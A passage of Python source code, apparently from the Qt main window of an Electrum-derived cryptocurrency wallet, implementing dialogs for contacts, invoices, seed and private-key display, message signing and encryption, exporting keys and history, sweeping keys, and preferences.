self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update()  # redraw so the list shows the original, unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
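# Expose every CLI command on the console namespace; each wrapped call receives
# the password dialog so protected commands can prompt the user when needed.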
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
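# Export keys on a worker thread so the GUI stays responsive; progress and
# completion are reported back through the two Qt signals connected below.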
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
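# Write the wallet history either as CSV rows or as a JSON list of dicts,
# depending on the 'is_csv' flag chosen in the export dialog.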
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
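# Sweep dialog: gather external private keys, then build a max-amount
# transaction from their UTXOs to one of this wallet's own addresses.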
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
# def on_dynfee(x):
# self.config.set_key('dynamic_fees', x == Qt.Checked)
# self.fee_slider.update()
# dynfee_cb = QCheckBox(_('Use dynamic fees'))
# dynfee_cb.setChecked(self.config.is_dynfee())
# dynfee_cb.setToolTip(_("Use fees recommended by the server."))
# fee_widgets.append((dynfee_cb, None))
# dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mMUE/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['MUE', 'mMUE', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1 MUE = 1000 mMUE.\n' \
+ _('This setting affects the amount fields in the Send tab.') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'MUE':
self.decimal_point = 8
elif unit_result == 'mMUE':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
